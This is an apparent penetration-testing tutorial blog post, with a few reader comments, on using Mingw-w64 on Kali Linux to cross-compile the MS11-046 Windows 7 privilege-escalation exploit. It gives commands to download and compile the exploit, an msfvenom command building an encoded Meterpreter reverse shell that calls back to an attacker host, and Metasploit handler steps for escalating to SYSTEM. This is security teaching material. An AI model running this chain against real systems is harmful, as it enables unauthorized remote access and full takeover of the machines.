Microsoft Windows still holds the largest market share when it comes to operating systems for desktop computers, both for enterprise use and personal use. Therefore it is highly likely you will encounter a lot of Windows workstations and servers during your penetration testing training and career. On the other hand, most penetration testers mainly use Linux based distributions such as Kali Linux, Pentoo or Backbox. Therefor you need the ability to quickly compile Windows exploits on your Linux machine. The solution for this is: Mingw-w64.
Mingw-w64 is a free and open source software development environment for creating Windows applications. Mingw-w64 was originally called Mingw32 which didn’t support the 64 bit architecture. In this tutorial we will be looking at how to use Mingw-64 to compile exploits for Windows on Kali Linux. Let’s start with installing Mingw-w64 on Kali Linux.
Installing Mingw-w64 on Kali Linux
Mingw-w64 is not installed by default on Kali Linux 2016.2 and earlier version. Therefore we need to install it first before we can compile Windows exploits on Linux. Run the following commands to install Mingw-w64:
apt-get update
apt-get install mingw-w64
Type y for yes to confirm and continue the Mingw-w64 installation process. Downloading and installing Mingw-w64 may take a little while to complete.
Unable to locate package mingw-w64
Sometimes you get a Unable to locate package mingw-w64 error when trying to install the mingw-w64 package and get something like:
root@kali:~# apt-get install mingw-w64
Reading package lists… Done
Building dependency tree
Reading state information… Done
E: Unable to locate package mingw-w64
To solve this issue make sure you have the right repositories in the sources.list file. You can edit the file using nano:
/etc/apt/sources.list
Make sure you have the correct repositories in this file. You can find the repositories for different versions of Kali Linux on the following page:
https://docs.kali.org/general-use/kali-linux-sources-list-repositories
With the right repositories in the sources.list file you need to run apt-get update and then run the installation command for the Mingw-w64 package again.
Cross compiling Windows exploits with Mingw-w64
Now that we have Mingw-w64 installed we can start to compile Windows exploits on Kali Linux. For this tutorial we will be compiling a Windows exploit written in c to exploit CVE-2011-1249 (MS11-046) vulnerability in Windows 7 SP0 x86. This version of the Windows operating system contains a vulnerability in the Ancillary Function Driver (AFD) which allows an elevation of privilege for an authenticated non administrative user. Even though Mingw-w64 was developed for the much needed 64 bit support we can also compile 32 bit Windows exploits. Let’s have a look at how we can compile 32 bit Windows exploits.
Let’s start with downloading the exploit from Exploit-db:
wget ‐‐output-document= 40564.c https://www.exploit-db.com/download/40564
Use the following command to compile the afd.sys exploit for Windows 32 bit:
i686-w64-mingw32-gcc [input file: source]–o [output file: .exe]–lws2_32
The following command will compile the Windows 7 afd.sys privilege escalation exploit:
i686-w64-mingw32-gcc 40564.c –o exploit.exe –lws2_32
To transfer the exploit to the target host we will be serving it with the build-in Apache webserver. The last 2 commands will copy exploit to the Apache home directory and start the Apache webserver.
When we download and execute the exploit from cmd.exe it will look like this:
As we can see the whoami command returns a privileged user before executing the exploit and system user after. This exploit actually spawns a new shell in the current shell where it was launched from instead of a new shell in a new window. This means we can also run this exploit from command line shell, such as Meterpreter. Let’s see how we can run the exploit from a Meterpreter session.
Exploit compilation errors
When compiling exploits for different architectures and operating systems many errors can occur. There are a lot of variables which can cause the compilation to fail, such as: syntax, libraries, host and target architectures, installed software used for compiling code and a lot more. Some errors may be easy to fix and some are not. It is also important to distinct warnings from fatal errors since warnings may just indicate something like deprecated functions which do not prevent the exploit from working. Fatal errors do prevent the exploit from working and therefor need to be fixed.
The best way to deal with compilation errors is to read them carefully and then search Google for solutions. Often you’re not the first and only person facing a certain compilation error and therefore it is not necessary to reinvent the wheel. Online resources such as stack exchange often provide you with possible solutions for the most common compilation errors.
Exploit MS11-046 from a Meterpreter shell
Let’s quickly generate a Windows 32-bit Meterpreter reverse TCP payload using Msfvenom and execute it on the target host. We will be using the multi handler in Metasploit to catch the reverse shell.
Use the following command to create the payload using Msfvenom:
msfvenom -a x86 –platform Windows -p windows/meterpreter/reverse_tcp LHOST=[IP attackbox] LPORT=4444 -e x86/shikata_ga_nai –f exe –o exploit.exe
Be sure to replace the listening host IP and if necessary the listening port. Now start msfconsole and run the following commands to set up the multi handler exploit:
use exploit/multi/handler
set lhost [listening host IP]
set lport 4444
run
Than download the exploit to the target host and execute it. If everything was setup correctly you should receive a reverse Meterpreter shell on the msfconsole:
Next type shell on the Meterpreter command line and run the privilege escalation exploit to escalate the shell to a system shell:
As you can see the shell goes from the privileged test user shell to a system shell. Please note that a new system shell is spawned in the shell where it was executed from. Therefor we cannot see the exploit output as it is in the old shell with limited privileges.
You can verify this by typing Exit which will exit the system shell and return you to the user shell which still contains the Windows 7 privilege escalation exploit output:
Lessons learned
In this tutorial we have learned the basics of cross compiling exploits for Windows on Linux. We have learned how to install Mingw-w64 on Kali Linux and solve the most common installation problems. To practice the exploit compilation process we have compiled a privilege escalation exploit targeted for Windows 7 x86. This is also called cross compiling.
We have successfully executed the compiled executable on the target host and escalated the shell from a limited user shell to a system shell. We have learned that this particular exploit spawned a shell inside the shell where the exploit was executed from. This way we can also execute the privilege escalation exploit from a command line such as a Meterpreter shell. Last but not least we have learned about how to fix errors during the compilation process. As an ethical hacker and penetration tester it is advised to consult resources like stack exchange to search for solutions for compilation errors.
Learn more about working with exploits?
Check out these tutorials:
5 Comments
Thank uuu
Very nice ! this is help a lot of people to understand the basic of priv escalation on Windows machines.
ThankS! Glad you liked it and it does teach about Windows Privilege Escalation.
Can you not run the exploit directly with msfconsole? Thanks!
what about cpp and cs?